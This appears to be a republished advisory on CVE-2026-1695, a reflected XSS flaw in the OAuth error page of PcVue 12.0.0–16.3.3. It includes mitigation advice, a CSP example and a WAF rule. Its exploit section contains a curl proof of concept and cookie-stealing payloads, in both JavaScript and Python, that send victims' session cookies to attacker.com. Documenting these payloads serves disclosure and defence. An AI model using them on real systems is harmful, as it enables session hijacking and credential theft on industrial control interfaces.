Listen to this Post
CVE-2026-1695 is a Cross-Site Scripting (XSS) vulnerability residing in the OAuth web services component of ARC Informatique’s PcVue software, specifically affecting versions 12.0.0 through 16.3.3 . The flaw is localized to the error page generated by the OAuth server when a user authentication attempt fails due to an “unknown client_id” . In this specific error condition, the application fails to properly neutralize or sanitize user-controllable input before including it in the HTTP response . A remote, unauthenticated attacker can exploit this by crafting a malicious link that, when clicked by a legitimate user, triggers a failed OAuth authentication attempt with a poisoned client_id parameter containing the XSS payload . This causes the victim’s browser to execute the attacker’s script in the context of the vulnerable PcVue web interface. The vulnerability has a CVSS v4.0 base score of 5.3 (MEDIUM), with a vector string of CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:N/AU:Y/R:U/RE:M/U:Clear, indicating a network-based attack with low complexity and no required privileges, but necessitating user interaction . Successful exploitation could lead to session hijacking, credential theft, or redirection to malicious sites within the context of the industrial monitoring application .
dailycve form:
Platform: PcVue
Version: 12.0.0-16.3.3
Vulnerability :XSS
Severity: MEDIUM
date: 02/26/2026
Prediction: Q2 2026
What Undercode Say:
Analytics
The vulnerability exists in the OAuth error page endpoint. An attacker can exploit it by tricking a user into visiting a URL with a malicious `client_id` parameter. The server reflects this input without proper sanitization, executing the script in the user’s browser.
Exploit:
Basic XSS PoC: Attempt to inject a script into the client_id parameter
Victim must be tricked into clicking this link after a failed auth.
curl -G "https://<TARGET-PCVUE-SERVER>/oauth/error" \
--data-urlencode "client_id=<script>alert('CVE-2026-1695-XSS')</script>" \
--data-urlencode "error=access_denied"
<!-- More stealthy payload example for session cookie theft -->
<img src="x" onerror="fetch('https://attacker.com/steal?cookie=' + document.cookie);">
Simple Python script to demonstrate the attack vector
import requests
target_url = "https://<VICTIM-PCVUE-SERVER>/oauth/error"
params = {
'client_id': '<script>document.location="https://attacker.com/log?c="+document.cookie</script>',
'error': 'access_denied'
}
print(f"[] Sending malicious request to {target_url}")
print("[] Requires user interaction (clicking link) to trigger.")
response = requests.get(target_url, params=params, verify=False)
print(f"[] Server responded with status: {response.status_code}")
Protection from this CVE
1. Apply vendor patch (upgrade to PcVue version 16.3.4 or 15.2.14 when released) 2. Implement a Content Security Policy (CSP) header to mitigate XSS execution. Example IIS configuration (web.config snippet): <system.webServer> <httpProtocol> <customHeaders> <add name="Content-Security-Policy" value="default-src 'self'; script-src 'self';" /> </customHeaders> </httpProtocol> </system.webServer> 3. Use OWASP ZAP or Burp Suite to scan for XSS vulnerabilities. 4. Web Application Firewall (WAF) rule to block malicious client_id patterns. ModSecurity Example Rule: SecRule ARGS:client_id "@rx <script>" "id:1001,phase:2,deny,status:403,msg:'XSS Payload in client_id'"
Impact
Successful exploitation allows remote attackers to execute arbitrary JavaScript in the context of a legitimate user’s session. This can lead to session hijacking, credential theft, unauthorized actions within the WebVue, WebScheduler, TouchVue, and SnapVue features, and potential further compromise of industrial control system data .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

